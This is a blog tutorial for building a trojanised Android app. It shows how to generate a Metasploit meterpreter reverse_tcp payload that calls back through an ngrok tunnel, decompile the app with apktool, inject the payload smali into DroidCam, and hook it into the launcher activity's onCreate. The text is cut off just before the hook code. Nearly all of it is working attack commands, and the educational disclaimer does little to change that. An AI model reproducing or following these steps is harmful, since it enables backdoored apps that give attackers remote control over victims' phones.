How to bind payload with APK in 2021
This blog will be about manually embedding payload into Android APK
Why Android?
As you can see on the left Android is the most common smartphone operating system in the world and in India alone, approx. 90 percent of users use smartphones to have Android installed on their computers, whether their Lollipop or Nugget edition. Thus, because of Android’s success and instability problem, it has been the first option for cybercriminals to pawn. A huge number of Android users are not too familiar with android security, which is another aspect that cybercriminals are taking advantage of, and by social engineering, users are downloading backdoor applications that contribute to system compromising. We’re going to speak in this article about a common technique that cybercriminals use in backdoor APKs.
DISCLAIMER: This tutorial/software is intended for only educational purposes. It should not be used for illegal activity. The author will not responsible for the use thereof. Don’t be a jerk about it.
Getting Started
Assuming that you know :
- Having a basic knowledge of Linux.
- Running a Debian-based system (Ubuntu, Kali Linux),
- An Original APK, I used DroidCam.
- Apktool, Ngrok, Metasploit installed.
Fire up Ngrok!
What is ngrok: It basically exposes local servers behind NATs and firewalls to the public internet over secure tunnels.
Start by signup to ngrok and get the auth token. Download ngrok and unzip it with unzipping/path/to/ngrok.zip
unzip /path/to/ngrok.zip
Once ngrok is unzipped you need to make ngrok executable using sudo chmod +x ngrok.
sudo chmod +x ngrok
Now we need to add our ngrok auth token, we can do this by using the command.
./ngrok authtoken <YOUR_AUTH_TOKEN>
Once auth token has been accepted launch ngrok using the command below. You can change the port to whatever port u want to open.
./ngrok tcp 4411
Switching on necessary services
Open a new command terminal and use commands below to start services.
service postgresql start
service apache2 start
Metasploit Part
Type below command to generate an android payload with ngrok.
msfvenom -p android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=12553 R > payload.apk
Now we have our malicious payload ready!
Now its time to decompile our apk files. Open up a new terminal and use the commands below to decompile our apk files to a new location.
apktool d -f payload.apk -o payload
Decompiling original
Command explanation: d option will tell apktool to decompile our apk file, -f is to replace previous decompiled apk’s code, -o is the output location we want our decompiled files to go to.
Payload.smali
Now, we need to copy the payload file to the original apk’s folder go to the directory. Payload file is Payload.smali which will be found at payload/smali/com/metasploit/stage location and from there copy the payload.smali file.
Now create few folder in original file folder. Original > smali > com > metasploit > stage.
Now create few folder in original file folder. Original > smali > com > metasploit > stage.
Now, copy payload.smali file and paste at this location.
Now, we need to find out what activity is running to run when the app is launched(Original app) the information is stored in the AndroidManifest.xml file.
Open the AndroidManifest.xml file with your favorite text editor. In the file, we are looking for a reference to the following code.
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
You will see Markup Languages, and both use the familiar tags and attributes. look for a <activity> tag which contains both of these lines you can use CTRL+F to search for the line of code.
We can see that the entry activity is listed as com.dev47apps.droidcam.DroidCam We know this because the XML contains an intent-filter with “android.intent.action.MAIN” within it.
Follow the location, smali>com>dev47apps>droidcam>DroidCam.smali
Open the file in your favorite text editor DroidCam.smali
Modify the Activity EntryPoint Smali File
Within the “Droidcam.smali” file, we are looking for the “onCreate()” method.
;→onCreate(Landroid/os/Bundle;)V
When you locate it, paste the following code in the line next to it this will start the payload alongside of the original apk code.
